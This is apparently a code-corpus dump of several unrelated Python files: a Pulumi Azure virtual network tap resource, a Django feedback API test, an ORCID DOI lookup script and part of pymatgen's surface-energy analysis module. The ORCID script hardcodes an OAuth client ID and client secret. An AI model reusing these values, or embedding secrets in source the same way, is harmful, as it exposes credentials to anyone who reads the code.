alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/latest:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20180801:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20181001:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20181101:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20181201:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190201:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190401:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190601:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190701:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20190801:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200301:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200501:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualNetworkTap"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VirtualNetworkTap")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkTap, __self__).__init__(
'azure-nextgen:network/v20190901:VirtualNetworkTap',
resource_name,
__props__,
opts)
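        # Illustrative usage sketch for the constructor above (resource names, resource group
        # and IP configuration id are hypothetical placeholders):
        #
        #     tap = VirtualNetworkTap(
        #         "example-tap",
        #         resource_group_name="example-rg",
        #         tap_name="example-tap",
        #         location="westus",
        #         destination_network_interface_ip_configuration=NetworkInterfaceIPConfigurationArgs(
        #             id="/subscriptions/<sub>/resourceGroups/example-rg/.../ipConfigurations/ipconfig1",
        #         ),
        #     )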
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkTap':
"""
Get an existing VirtualNetworkTap resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return VirtualNetworkTap(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="destinationLoadBalancerFrontEndIPConfiguration")
def destination_load_balancer_front_end_ip_configuration(self) -> pulumi.Output[Optional['outputs.FrontendIPConfigurationResponse']]:
"""
The reference to the private IP address on the internal Load Balancer that will receive the tap.
"""
return pulumi.get(self, "destination_load_balancer_front_end_ip_configuration")
@property
@pulumi.getter(name="destinationNetworkInterfaceIPConfiguration")
def destination_network_interface_ip_configuration(self) -> pulumi.Output[Optional['outputs.NetworkInterfaceIPConfigurationResponse']]:
"""
The reference to the private IP Address of the collector nic that will receive the tap.
"""
return pulumi.get(self, "destination_network_interface_ip_configuration")
@property
@pulumi.getter(name="destinationPort")
def destination_port(self) -> pulumi.Output[Optional[int]]:
"""
The VXLAN destination port that will receive the tapped traffic.
"""
return pulumi.get(self, "destination_port")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaceTapConfigurations")
def network_interface_tap_configurations(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceTapConfigurationResponse']]:
"""
Specifies the list of resource IDs for the network interface IP configuration that needs to be tapped.
"""
return pulumi.get(self, "network_interface_tap_configurations")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network tap resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the virtual network tap resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
py | 7dfad002ce07e5ee2be8b2512a13fc24a9a4c04b | """
Feedback REST API Test
"""
import json
import logging
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITransactionTestCase
from ..models import Feedback
logger = logging.getLogger(__name__)
class FeedbackRestTestCases(APITransactionTestCase):
"""
Test Cases for Feedback REST API
"""
def setUp(self):
logger.warning('Start REST API test')
url = reverse('api:feedback-list')
data = {
'satisfaction': 'PR',
}
self.client.post(url, data, format='json')
self.exist_num = 1
def test_setup_is_valid(self):
"""
Make sure setup is valid
"""
url = reverse('api:feedback-list')
response = self.client.get(url, format='json')
# logger.warning(response.content)
self.assertEqual(len(json.loads(response.content)), self.exist_num)
def test_create_feedback_1(self):
"""
@Type
Positive
@Description
        Ensure we can create a feedback via the REST API.
"""
url = reverse('api:feedback-list')
feedback_sat = 'FR'
data = {'satisfaction': feedback_sat}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
json.loads(response.content)['satisfaction'], feedback_sat)
# Get feedback list
response = self.client.get(url, format='json')
self.assertEqual(len(json.loads(response.content)), self.exist_num + 1)
# Check using db
self.assertEqual(Feedback.objects.count(), self.exist_num + 1)
|
py | 7dfad0d26d3e71bac0bc9b9fd10774afb0cdf397 | from collections import defaultdict
class DirectoryReport:
def __init__(self, files, mtime, scratch_disk):
self.size = 0
self.filetypes = defaultdict(int)
self.num_files = files
self.mtime = mtime
self.pi = None
self.group_name = None
self.scratch_disk = scratch_disk
|
py | 7dfad17c61f1f21f3360b4bfa3e35e6434caea02 | import grequests
import csv
import time
import sys
from oauthlib.oauth2 import BackendApplicationClient
from requests_oauthlib import OAuth2Session
from requests.auth import HTTPBasicAuth
class OrcidSearcher:
def __init__(self, accessToken, writer):
self.queue = []
self.writer = writer
self.accessToken = self.getToken()
self.headers = headers = {"Content-Type": "application/json",
"Authorization": "Bearer " + self.accessToken}
def getToken(self):
client_id = "APP-7JEN2756AHK9GJ2F"
client_secret = "7f0dbea9-1334-4013-b092-d3d65a194836"
scope = ['/read-public']
auth = HTTPBasicAuth(client_id, client_secret)
client = BackendApplicationClient(client_id=client_id)
oauth = OAuth2Session(client=client, scope=scope)
return oauth.fetch_token(token_url='https://orcid.org/oauth/token', auth=auth, scope=scope)["access_token"]
def search(self, coreId, doi):
        # Queue the full [url, doi, coreId] triple so the batch handling below can recover
        # the DOI and CORE id for every queued request; flush once 12 requests have accumulated.
        self.queue.append([self.getSearchUrl(doi), doi, coreId])
        if len(self.queue) >= 12:
requestset = (grequests.get(item[0], headers=self.headers) for item in self.queue)
startTime = time.time()
responses = grequests.map(requestset)
i = 0
for response in responses:
if not response:
print(response)
if response is not None and response.status_code >= 400:
self.accessToken = self.getToken()
self.headers = {"Content-Type": "application/json",
"Authorization": "Bearer " + self.accessToken}
print("Refreshing token...")
continue
i += 1
continue
if response.status_code >= 400:
exit()
data = response.json()
orcids = []
print()
if len(data['result'])>0:
print (data['result'])
for profile in data['result']:
orcids.append(profile['orcid-identifier']['uri'])
if orcids:
print("%d orcids found for %s doi %s" % (len(orcids), self.queue[i][2], self.queue[i][1]))
self.saveResults(self.queue[i][2], self.queue[i][1], orcids)
i += 1
endTime = time.time()
if (endTime - startTime < 1):
                print("Oops, hit the rate limit, sleeping")
time.sleep(1)
self.queue = []
def getSearchUrl(self, doi):
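        # Builds the ORCID public search query for works that list this DOI; e.g. a
        # hypothetical DOI 10.1000/xyz123 becomes
        # https://pub.orcid.org/v2.1/search/?q=doi-self:%2210.1000/xyz123%22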
return "https://pub.orcid.org/v2.1/search/?q=doi-self:%22" + doi + "%22"
def saveResults(self, coreId, doi, orcids):
for orcid in orcids:
row = (coreId, doi, orcid)
self.writer.writerow(row)
if __name__ == '__main__':
startfrom = int(sys.argv[2])
counter = 0
with open(sys.argv[1], 'r') as csvfiletoread:
spamreader = csv.reader(csvfiletoread, delimiter=',', quotechar='|')
with open('results/'+sys.argv[1], 'w') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
searcher = OrcidSearcher('aa986fc3-621f-4822-8346-2e0ee20108ef', writer)
for row in spamreader:
counter += 1
if counter >=startfrom:
if len(row)>1:
searcher.search(row[0], row[1])
print("Completed: " + str(counter))
|
py | 7dfad186d82f3a1fca04407a9b8946ad7bc79761 | # Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module defines tools to analyze surface and adsorption related
quantities as well as related plots. If you use this module, please
consider citing the following works::
R. Tran, Z. Xu, B. Radhakrishnan, D. Winston, W. Sun, K. A. Persson,
S. P. Ong, "Surface Energies of Elemental Crystals", Scientific
Data, 2016, 3:160080, doi: 10.1038/sdata.2016.80.
and
Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
stabilization of sodium oxides: Implications for Na-O2 batteries.
Nano Letters, 14(2), 1016–1020. https://doi.org/10.1021/nl404557w
and
Montoya, J. H., & Persson, K. A. (2017). A high-throughput framework
for determining adsorption energies on solid surfaces. Npj
Computational Materials, 3(1), 14.
https://doi.org/10.1038/s41524-017-0017-z
TODO:
-Still assumes individual elements have their own chempots
in a molecular adsorbate instead of considering a single
chempot for a single molecular adsorbate. E.g. for an OH
adsorbate, the surface energy is a function of delu_O and
delu_H instead of delu_OH
-Need a method to automatically get chempot range when
dealing with non-stoichiometric slabs
-Simplify the input for SurfaceEnergyPlotter such that the
user does not need to generate a dict
"""
import copy
import itertools
import random
import warnings
import numpy as np
from sympy import Symbol
from sympy.solvers import linsolve, solve
from pymatgen.analysis.wulff import WulffShape
from pymatgen.core.composition import Composition
from pymatgen.core.surface import get_slab_regions
from pymatgen.entries.computed_entries import ComputedStructureEntry
from pymatgen.io.vasp.outputs import Locpot, Outcar, Poscar
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
from pymatgen.util.plotting import pretty_plot
EV_PER_ANG2_TO_JOULES_PER_M2 = 16.0217656
__author__ = "Richard Tran"
__credits__ = "Joseph Montoya, Xianguo Li"
class SlabEntry(ComputedStructureEntry):
"""
A ComputedStructureEntry object encompassing all data relevant to a
slab for analyzing surface thermodynamics.
.. attribute:: miller_index
Miller index of plane parallel to surface.
.. attribute:: label
Brief description for this slab.
.. attribute:: adsorbates
List of ComputedStructureEntry for the types of adsorbates
    .. attribute:: clean_entry
SlabEntry for the corresponding clean slab for an adsorbed slab
    .. attribute:: ads_entries_dict
Dictionary where the key is the reduced composition of the
adsorbate entry and value is the entry itself
"""
def __init__(
self,
structure,
energy,
miller_index,
correction=0.0,
parameters=None,
data=None,
entry_id=None,
label=None,
adsorbates=None,
clean_entry=None,
marker=None,
color=None,
):
"""
Make a SlabEntry containing all relevant surface thermodynamics data.
Args:
structure (Slab): The primary slab associated with this entry.
energy (float): Energy from total energy calculation
miller_index (tuple(h, k, l)): Miller index of plane parallel
to surface
correction (float): See ComputedSlabEntry
parameters (dict): See ComputedSlabEntry
            data (dict): See ComputedSlabEntry
            entry_id (obj): See ComputedSlabEntry
label (str): Any particular label for this slab, e.g. "Tasker 2",
"non-stoichiometric", "reconstructed"
adsorbates ([ComputedStructureEntry]): List of reference entries
for the adsorbates on the slab, can be an isolated molecule
                (e.g. O2 for O or O2 adsorption), a bulk structure (e.g. fcc
Cu for Cu adsorption) or anything.
clean_entry (ComputedStructureEntry): If the SlabEntry is for an
adsorbed slab, this is the corresponding SlabEntry for the
clean slab
marker (str): Custom marker for gamma plots ("--" and "-" are typical)
color (str or rgba): Custom color for gamma plots
"""
self.miller_index = miller_index
self.label = label
self.adsorbates = [] if not adsorbates else adsorbates
self.clean_entry = clean_entry
self.ads_entries_dict = {str(list(ads.composition.as_dict().keys())[0]): ads for ads in self.adsorbates}
self.mark = marker
self.color = color
super().__init__(
structure,
energy,
correction=correction,
parameters=parameters,
data=data,
entry_id=entry_id,
)
def as_dict(self):
"""
Returns dict which contains Slab Entry data.
"""
d = {"@module": type(self).__module__, "@class": type(self).__name__}
d["structure"] = self.structure
d["energy"] = self.energy
d["miller_index"] = self.miller_index
d["label"] = self.label
d["adsorbates"] = self.adsorbates
d["clean_entry"] = self.clean_entry
return d
def gibbs_binding_energy(self, eads=False):
"""
        Returns the adsorption energy or Gibbs binding energy
of an adsorbate on a surface
Args:
eads (bool): Whether to calculate the adsorption energy
(True) or the binding energy (False) which is just
adsorption energy normalized by number of adsorbates.
"""
n = self.get_unit_primitive_area
Nads = self.Nads_in_slab
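        # Binding energy per adsorbate: BE = (E_ads_slab - n * E_clean_slab) / N_ads minus the
        # adsorbate reference energies per atom; n rescales the clean slab to the adsorbed cell area.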
BE = (self.energy - n * self.clean_entry.energy) / Nads - sum(ads.energy_per_atom for ads in self.adsorbates)
return BE * Nads if eads else BE
def surface_energy(self, ucell_entry, ref_entries=None):
"""
Calculates the surface energy of this SlabEntry.
Args:
ucell_entry (entry): An entry object for the bulk
ref_entries (list: [entry]): A list of entries for each type
of element to be used as a reservoir for nonstoichiometric
systems. The length of this list MUST be n-1 where n is the
number of different elements in the bulk entry. The chempot
of the element ref_entry that is not in the list will be
treated as a variable.
Returns (Add (Sympy class)): Surface energy
"""
# Set up
ref_entries = [] if not ref_entries else ref_entries
# Check if appropriate ref_entries are present if the slab is non-stoichiometric
# TODO: There should be a way to identify which specific species are
# non-stoichiometric relative to the others in systems with more than 2 species
slab_comp = self.composition.as_dict()
ucell_entry_comp = ucell_entry.composition.reduced_composition.as_dict()
slab_clean_comp = Composition({el: slab_comp[el] for el in ucell_entry_comp.keys()})
if slab_clean_comp.reduced_composition != ucell_entry.composition.reduced_composition:
list_els = [list(entry.composition.as_dict().keys())[0] for entry in ref_entries]
if not any(el in list_els for el in ucell_entry.composition.as_dict().keys()):
warnings.warn("Elemental references missing for the non-dopant species.")
gamma = (Symbol("E_surf") - Symbol("Ebulk")) / (2 * Symbol("A"))
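        # i.e. gamma = (E_slab - E_bulk_contrib) / (2A). The bulk contribution assembled below
        # sums N_el * (delu_el + E_ref,el) over elements with reference entries, plus the
        # remaining element's share inferred from the bulk energy per formula unit.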
ucell_comp = ucell_entry.composition
ucell_reduced_comp = ucell_comp.reduced_composition
ref_entries_dict = {str(list(ref.composition.as_dict().keys())[0]): ref for ref in ref_entries}
ref_entries_dict.update(self.ads_entries_dict)
# Calculate Gibbs free energy of the bulk per unit formula
gbulk = ucell_entry.energy / ucell_comp.get_integer_formula_and_factor()[1]
# First we get the contribution to the bulk energy
# from each element with an existing ref_entry.
bulk_energy, gbulk_eqn = 0, 0
for el, ref in ref_entries_dict.items():
N, delu = self.composition.as_dict()[el], Symbol("delu_" + str(el))
if el in ucell_comp.as_dict().keys():
gbulk_eqn += ucell_reduced_comp[el] * (delu + ref.energy_per_atom)
bulk_energy += N * (Symbol("delu_" + el) + ref.energy_per_atom)
# Next, we add the contribution to the bulk energy from
# the variable element (the element without a ref_entry),
# as a function of the other elements
for ref_el in ucell_comp.as_dict().keys():
if str(ref_el) not in ref_entries_dict.keys():
break
refEperA = (gbulk - gbulk_eqn) / ucell_reduced_comp.as_dict()[ref_el]
bulk_energy += self.composition.as_dict()[ref_el] * refEperA
se = gamma.subs(
{
Symbol("E_surf"): self.energy,
Symbol("Ebulk"): bulk_energy,
Symbol("A"): self.surface_area,
}
)
return float(se) if type(se).__name__ == "Float" else se
@property
def get_unit_primitive_area(self):
"""
Returns the surface area of the adsorbed system per
unit area of the primitive slab system.
"""
A_ads = self.surface_area
A_clean = self.clean_entry.surface_area
n = A_ads / A_clean
return n
@property
def get_monolayer(self):
"""
Returns the primitive unit surface area density of the
adsorbate.
"""
unit_a = self.get_unit_primitive_area
Nsurfs = self.Nsurfs_ads_in_slab
Nads = self.Nads_in_slab
return Nads / (unit_a * Nsurfs)
@property
def Nads_in_slab(self):
"""
Returns the TOTAL number of adsorbates in the slab on BOTH sides
"""
return sum(self.composition.as_dict()[a] for a in self.ads_entries_dict.keys())
@property
def Nsurfs_ads_in_slab(self):
"""
Returns the TOTAL number of adsorbed surfaces in the slab
"""
struct = self.structure
weights = [s.species.weight for s in struct]
center_of_mass = np.average(struct.frac_coords, weights=weights, axis=0)
Nsurfs = 0
# Are there adsorbates on top surface?
if any(
site.species_string in self.ads_entries_dict.keys()
for site in struct
if site.frac_coords[2] > center_of_mass[2]
):
Nsurfs += 1
# Are there adsorbates on bottom surface?
if any(
site.species_string in self.ads_entries_dict.keys()
for site in struct
if site.frac_coords[2] < center_of_mass[2]
):
Nsurfs += 1
return Nsurfs
@classmethod
def from_dict(cls, d):
"""
Returns a SlabEntry by reading in an dictionary
"""
        # as_dict() above stores the structure object and energy value directly, so read them back as-is
        structure = d["structure"]
        energy = d["energy"]
miller_index = d["miller_index"]
label = d["label"]
adsorbates = d["adsorbates"]
clean_entry = d["clean_entry"]
return SlabEntry(
structure,
energy,
miller_index,
label=label,
adsorbates=adsorbates,
clean_entry=clean_entry,
)
@property
def surface_area(self):
"""
Calculates the surface area of the slab
"""
m = self.structure.lattice.matrix
return np.linalg.norm(np.cross(m[0], m[1]))
@property
def cleaned_up_slab(self):
"""
Returns a slab with the adsorbates removed
"""
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.structure.copy()
cleaned.remove_species(ads_strs)
return cleaned
@property
def create_slab_label(self):
"""
Returns a label (str) for this particular slab based
on composition, coverage and Miller index.
"""
if "label" in self.data.keys():
return self.data["label"]
label = str(self.miller_index)
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.cleaned_up_slab
label += f" {cleaned.composition.reduced_composition}"
if self.adsorbates:
for ads in ads_strs:
label += f"+{ads}"
label += f", {self.get_monolayer:.3f} ML"
return label
@staticmethod
def from_computed_structure_entry(entry, miller_index, label=None, adsorbates=None, clean_entry=None, **kwargs):
"""
Returns SlabEntry from a ComputedStructureEntry
"""
return SlabEntry(
entry.structure,
entry.energy,
miller_index,
label=label,
adsorbates=adsorbates,
clean_entry=clean_entry,
**kwargs,
)
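# Illustrative sketch (the entry objects are hypothetical): the nested dictionary format
# consumed by SurfaceEnergyPlotter below, with one clean and one adsorbed (111) termination.
#
#     all_slab_entries = {(1, 1, 1): {clean_111_entry: [ads_111_O_entry]}}
#     plotter = SurfaceEnergyPlotter(all_slab_entries, ucell_entry)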
class SurfaceEnergyPlotter:
"""
A class used for generating plots to analyze the thermodynamics of surfaces
of a material. Produces stability maps of different slab configurations,
phases diagrams of two parameters to determine stability of configurations
(future release), and Wulff shapes.
.. attribute:: all_slab_entries
Either a list of SlabEntry objects (note for a list, the SlabEntry must
        have the adsorbates and clean_entry parameters plugged in) or a nested
dictionary containing a list of entries for slab calculations as
items and the corresponding Miller index of the slab as the key.
To account for adsorption, each value is a sub-dictionary with the
entry of a clean slab calculation as the sub-key and a list of
entries for adsorption calculations as the sub-value. The sub-value
can contain different adsorption configurations such as a different
site or a different coverage, however, ordinarily only the most stable
configuration for a particular coverage will be considered as the
function of the adsorbed surface energy has an intercept dependent on
the adsorption energy (ie an adsorption site with a higher adsorption
energy will always provide a higher surface energy than a site with a
lower adsorption energy). An example parameter is provided:
{(h1,k1,l1): {clean_entry1: [ads_entry1, ads_entry2, ...],
clean_entry2: [...], ...}, (h2,k2,l2): {...}}
where clean_entry1 can be a pristine surface and clean_entry2 can be a
reconstructed surface while ads_entry1 can be adsorption at site 1 with
a 2x2 coverage while ads_entry2 can have a 3x3 coverage. If adsorption
entries are present (i.e. if all_slab_entries[(h,k,l)][clean_entry1]), we
consider adsorption in all plots and analysis for this particular facet.
    .. attribute:: color_dict
        Randomly generated dictionary of colors (r,g,b,a), keyed by individual surface
        entries, used when plotting surface energy stability. Clean surfaces have a solid
        color while the corresponding adsorbed surfaces are transparent.
.. attribute:: ucell_entry
ComputedStructureEntry of the bulk reference for this particular material.
.. attribute:: ref_entries
List of ComputedStructureEntries to be used for calculating chemical potential.
"""
def __init__(self, all_slab_entries, ucell_entry, ref_entries=None):
"""
Object for plotting surface energy in different ways for clean and
adsorbed surfaces.
Args:
all_slab_entries (dict or list): Dictionary or list containing
all entries for slab calculations. See attributes.
ucell_entry (ComputedStructureEntry): ComputedStructureEntry
of the bulk reference for this particular material.
ref_entries ([ComputedStructureEntries]): A list of entries for
each type of element to be used as a reservoir for
nonstoichiometric systems. The length of this list MUST be
n-1 where n is the number of different elements in the bulk
entry. The bulk energy term in the grand surface potential can
be defined by a summation of the chemical potentials for each
element in the system. As the bulk energy is already provided,
one can solve for one of the chemical potentials as a function
                of the other chemical potentials and the bulk energy, i.e. there
are n-1 variables (chempots). e.g. if your ucell_entry is for
LiFePO4 than your ref_entries should have an entry for Li, Fe,
and P if you want to use the chempot of O as the variable.
"""
self.ucell_entry = ucell_entry
self.ref_entries = ref_entries
self.all_slab_entries = (
all_slab_entries if type(all_slab_entries).__name__ == "dict" else entry_dict_from_list(all_slab_entries)
)
self.color_dict = self.color_palette_dict()
se_dict, as_coeffs_dict = {}, {}
for hkl in self.all_slab_entries.keys():
for clean in self.all_slab_entries[hkl].keys():
se = clean.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[clean] = se
as_coeffs_dict[clean] = {1: se}
else:
se_dict[clean] = se
as_coeffs_dict[clean] = se.as_coefficients_dict()
for dope in self.all_slab_entries[hkl][clean]:
se = dope.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[dope] = se
as_coeffs_dict[dope] = {1: se}
else:
se_dict[dope] = se
as_coeffs_dict[dope] = se.as_coefficients_dict()
self.surfe_dict = se_dict
self.as_coeffs_dict = as_coeffs_dict
list_of_chempots = []
for k, v in self.as_coeffs_dict.items():
if type(v).__name__ == "float":
continue
for du in v.keys():
if du not in list_of_chempots:
list_of_chempots.append(du)
self.list_of_chempots = list_of_chempots
def get_stable_entry_at_u(
self,
miller_index,
delu_dict=None,
delu_default=0,
no_doped=False,
no_clean=False,
):
"""
Returns the entry corresponding to the most stable slab for a particular
facet at a specific chempot. We assume that surface energy is constant
so all free variables must be set with delu_dict, otherwise they are
assumed to be equal to delu_default.
Args:
miller_index ((h,k,l)): The facet to find the most stable slab in
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
Returns:
SlabEntry, surface_energy (float)
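        Example (illustrative; ``plotter`` is an instance of this class and the chempot
        value is hypothetical)::
            entry, gamma = plotter.get_stable_entry_at_u(
                (1, 1, 1), delu_dict={Symbol("delu_O"): -0.5}
            )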
"""
all_delu_dict = self.set_all_variables(delu_dict, delu_default)
def get_coeffs(e):
coeffs = []
for du in all_delu_dict.keys():
if type(self.as_coeffs_dict[e]).__name__ == "float":
coeffs.append(self.as_coeffs_dict[e])
elif du in self.as_coeffs_dict[e].keys():
coeffs.append(self.as_coeffs_dict[e][du])
else:
coeffs.append(0)
return np.array(coeffs)
all_entries, all_coeffs = [], []
for entry in self.all_slab_entries[miller_index].keys():
if not no_clean:
all_entries.append(entry)
all_coeffs.append(get_coeffs(entry))
if not no_doped:
for ads_entry in self.all_slab_entries[miller_index][entry]:
all_entries.append(ads_entry)
all_coeffs.append(get_coeffs(ads_entry))
du_vals = np.array(list(all_delu_dict.values()))
all_gamma = list(np.dot(all_coeffs, du_vals.T))
return all_entries[all_gamma.index(min(all_gamma))], float(min(all_gamma))
def wulff_from_chempot(
self,
delu_dict=None,
delu_default=0,
symprec=1e-5,
no_clean=False,
no_doped=False,
):
"""
Method to get the Wulff shape at a specific chemical potential.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
symprec (float): See WulffShape.
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
Returns:
(WulffShape): The WulffShape at u_ref and u_ads.
"""
latt = SpacegroupAnalyzer(self.ucell_entry.structure).get_conventional_standard_structure().lattice
miller_list = self.all_slab_entries.keys()
e_surf_list = []
for hkl in miller_list:
# For all configurations, calculate surface energy as a
# function of u. Use the lowest surface energy (corresponds
# to the most stable slab termination at that particular u)
gamma = self.get_stable_entry_at_u(
hkl,
delu_dict=delu_dict,
delu_default=delu_default,
no_clean=no_clean,
no_doped=no_doped,
)[1]
e_surf_list.append(gamma)
return WulffShape(latt, miller_list, e_surf_list, symprec=symprec)
def area_frac_vs_chempot_plot(
self,
ref_delu,
chempot_range,
delu_dict=None,
delu_default=0,
increments=10,
no_clean=False,
no_doped=False,
):
"""
1D plot. Plots the change in the area contribution
of each facet as a function of chemical potential.
Args:
ref_delu (sympy Symbol): The free variable chempot with the format:
Symbol("delu_el") where el is the name of the element.
chempot_range (list): Min/max range of chemical potential to plot along
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
increments (int): Number of data points between min/max or point
of intersection. Defaults to 10 points.
Returns:
(Pylab): Plot of area frac on the Wulff shape
for each facet vs chemical potential.
"""
delu_dict = delu_dict if delu_dict else {}
chempot_range = sorted(chempot_range)
all_chempots = np.linspace(min(chempot_range), max(chempot_range), increments)
# initialize a dictionary of lists of fractional areas for each hkl
hkl_area_dict = {}
for hkl in self.all_slab_entries.keys():
hkl_area_dict[hkl] = []
# Get plot points for each Miller index
for u in all_chempots:
delu_dict[ref_delu] = u
wulffshape = self.wulff_from_chempot(
delu_dict=delu_dict,
no_clean=no_clean,
no_doped=no_doped,
delu_default=delu_default,
)
for hkl in wulffshape.area_fraction_dict.keys():
hkl_area_dict[hkl].append(wulffshape.area_fraction_dict[hkl])
# Plot the area fraction vs chemical potential for each facet
plt = pretty_plot(width=8, height=7)
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
clean_entry = list(self.all_slab_entries[hkl].keys())[0]
# Ignore any facets that never show up on the
# Wulff shape regardless of chemical potential
if all(a == 0 for a in hkl_area_dict[hkl]):
continue
plt.plot(
all_chempots,
hkl_area_dict[hkl],
"--",
color=self.color_dict[clean_entry],
label=str(hkl),
)
# Make the figure look nice
plt.ylabel(r"Fractional area $A^{Wulff}_{hkl}/A^{Wulff}$")
self.chempot_plot_addons(
plt,
chempot_range,
str(ref_delu).split("_")[1],
axes,
rect=[-0.0, 0, 0.95, 1],
pad=5,
ylim=[0, 1],
)
return plt
def get_surface_equilibrium(self, slab_entries, delu_dict=None):
"""
Takes in a list of SlabEntries and calculates the chemical potentials
at which all slabs in the list coexists simultaneously. Useful for
building surface phase diagrams. Note that to solve for x equations
(x slab_entries), there must be x free variables (chemical potentials).
Adjust delu_dict as need be to get the correct number of free variables.
Args:
slab_entries (array): The coefficients of the first equation
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
Returns:
(array): Array containing a solution to x equations with x
variables (x-1 chemical potential and 1 surface energy)
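        Example (illustrative; ``plotter`` is an instance of this class and ``entry_a``,
        ``entry_b`` are hypothetical SlabEntry objects of the same facet)::
            soln = plotter.get_surface_equilibrium([entry_a, entry_b])
            # soln maps each free chempot Symbol and Symbol("gamma") to its value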
"""
# Generate all possible coefficients
all_parameters = []
all_eqns = []
for slab_entry in slab_entries:
se = self.surfe_dict[slab_entry]
# remove the free chempots we wish to keep constant and
# set the equation to 0 (subtract gamma from both sides)
if type(se).__name__ == "float":
all_eqns.append(se - Symbol("gamma"))
else:
se = sub_chempots(se, delu_dict) if delu_dict else se
all_eqns.append(se - Symbol("gamma"))
all_parameters.extend([p for p in list(se.free_symbols) if p not in all_parameters])
all_parameters.append(Symbol("gamma"))
# Now solve the system of linear eqns to find the chempot
# where the slabs are at equilibrium with each other
soln = linsolve(all_eqns, all_parameters)
if not soln:
warnings.warn("No solution")
return soln
return {p: list(soln)[0][i] for i, p in enumerate(all_parameters)}
def stable_u_range_dict(
self,
chempot_range,
ref_delu,
no_doped=True,
no_clean=False,
delu_dict={},
miller_index=(),
dmu_at_0=False,
return_se_dict=False,
):
"""
Creates a dictionary where each entry is a key pointing to a
chemical potential range where the surface of that entry is stable.
Does so by enumerating through all possible solutions (intersect)
for surface energies of a specific facet.
Args:
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
